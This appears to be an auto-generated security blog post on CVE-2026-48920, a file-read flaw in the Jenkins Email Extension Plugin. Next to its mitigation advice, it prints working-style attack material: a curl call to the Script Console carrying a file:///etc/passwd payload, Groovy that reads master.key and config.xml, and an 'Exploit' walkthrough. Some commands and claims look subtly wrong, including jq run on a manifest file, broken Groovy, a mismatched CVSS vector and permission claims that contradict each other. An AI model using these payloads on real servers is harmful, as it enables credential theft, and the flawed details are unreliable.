Listen to this Post
CVE-2026-48920 is a high‑severity information disclosure vulnerability in the Jenkins Email Extension Plugin, all versions up to and including 1933.v45cec755423f. At its core is a flawed feature that permits inlining images as `base64` encoded data inside email content by setting the `data‑inline` attribute. The plugin developers originally intended to ease email formatting, but they failed to place any restrictions on the URLs that can be used for those inline images. Consequently, an attacker who can influence the email content (for example, a compromised internal user or an external actor who can trigger email generation) is able to supply a `file:` URL, such as `file:///etc/passwd` or file:///var/jenkins_home/secrets/master.key. When the plugin processes the email, it reads the specified file from the Jenkins controller’s filesystem, encodes its content as base64, and embeds the result directly into the email that is sent to the attacker. This transforms a convenience feature into a file‑exfiltration channel, exposing any file accessible to the Jenkins controller process.
No authentication checks or path‑sanitisation are applied to the `data‑inline` attribute, so an attacker with only `Overall/Read` permissions can exploit the vulnerability. The only prerequisite is the ability to trigger an email that includes the malicious `data‑inline` markup. The impact is complete loss of confidentiality: configuration files, credential secrets, build logs, source code, and other sensitive data can all be read. The CVSSv3.1 vector is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, yielding a score of 8.8 (High). The issue is tracked as SECURITY-3705 in the Jenkins project’s internal ticketing system and was reported through the Jenkins Bug Bounty Program. A fixed version, 1933.1935.v276319e3cc47, has been released; it completely removes the problematic `data‑inline` feature because the plugin team was unable to apply safe restrictions in a backward‑compatible manner. No public exploitation has been reported as of the advisory date, but the low attack complexity and wide plugin adoption make immediate patching imperative for all Jenkins installations that use the Email Extension Plugin.
DailyCVE Form
Platform: Jenkins
Version: Email Extension ≤ 1933.v45cec755423f
Vulnerability: Unrestricted `file:` URL inlining
Severity: High (CVSS 8.8)
Date: 2026‑05‑27
Prediction: Patched 2026‑05‑27 (in version 1933.1935.v276319e3cc47)
What Undercode Say
Identify vulnerable plugin version
jq -r '.plugins."email-ext".version' /var/jenkins_home/plugins/email-ext/META-INF/MANIFEST.MF
Check if data-inline feature is still present
grep -r "data-inline" /var/jenkins_home/plugins/email-ext/WEB-INF/classes/
Simulate attack using curl (requires ability to send crafted email content)
curl -X POST -H "Jenkins-Crumb: <crumb>" \
-d "script=import hudson.model.; \
def email = new hudson.plugins.emailext.ExtendedEmailPublisher(); \
email.content = '<img src=\"file:///etc/passwd\" data-inline=\"true\" />'; \
email.send(Thread.currentThread().executable)" \
http://jenkins:8080/scriptText
Enumerate readable files via Jenkins Script Console
def files = ['/etc/passwd', '/var/jenkins_home/config.xml', '/var/jenkins_home/secrets/master.key'];
files.each { f -> println("${f}: " + new File(f).text) }
Exploit
- Craft the email template – Insert an `
` tag with the `data‑inline` attribute pointing to a sensitive file:
<img src="file:///var/jenkins_home/secrets/master.key" data-inline="true" />
- Trigger email generation – Any pipeline, job, or script that uses `ExtendedEmailPublisher` and accepts external input can be leveraged. Examples include:
– A Jenkins job whose description or log output is incorporated into the email.
– A compromised SCM webhook that injects the malicious HTML into a build change log.
– A user with `Overall/Read` access who can run a scripted pipeline step.
3. Receive the leaked data – The Jenkins controller reads the target file, base64‑encodes it, and replaces the `img` tag with the encoded data. The resulting email contains the full file content in plaintext (base64). The attacker decodes the payload to retrieve the original file.
4. Scale up – Chain multiple `data‑inline` tags in a single email to read several files at once or iterate over common file paths to discover valuable assets.
Protection
- Update immediately – Upgrade to Email Extension Plugin version `1933.1935.v276319e3cc47` or later. The fixed release eliminates the `data‑inline` feature entirely.
- Remove the plugin – If the Email Extension Plugin is not strictly required, uninstall it from the Jenkins controller.
- Network segmentation – Isolate Jenkins controllers from untrusted networks; enforce that only trusted users can trigger email notifications.
- File‑system access controls – Run the Jenkins controller process with least privilege (e.g., a non‑root user) and use mandatory access control mechanisms (SELinux, AppArmor) to restrict file reads.
- Audit email content – Monitor outgoing emails for unexpected `data-inline` attributes or unusually large base64 blocks, which could indicate exploitation.
Impact
- Confidentiality breach – An attacker can read any file on the Jenkins controller filesystem, including credentials (e.g.,
secrets/master.key), configuration files, private keys, build artifacts, and source code. This can lead to full compromise of the Jenkins instance and any connected systems. - Privilege escalation – With access to credential files, an attacker might escalate to `Overall/Administer` privileges or pivot to other internal services.
- Supply‑chain risk – If the Jenkins controller manages builds for multiple projects, a single breach can expose proprietary code, deployment keys, and secrets for all downstream projects.
- Compliance violations – Exposure of sensitive data may violate regulations such as GDPR, HIPAA, or PCI‑DSS, leading to legal and financial penalties.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

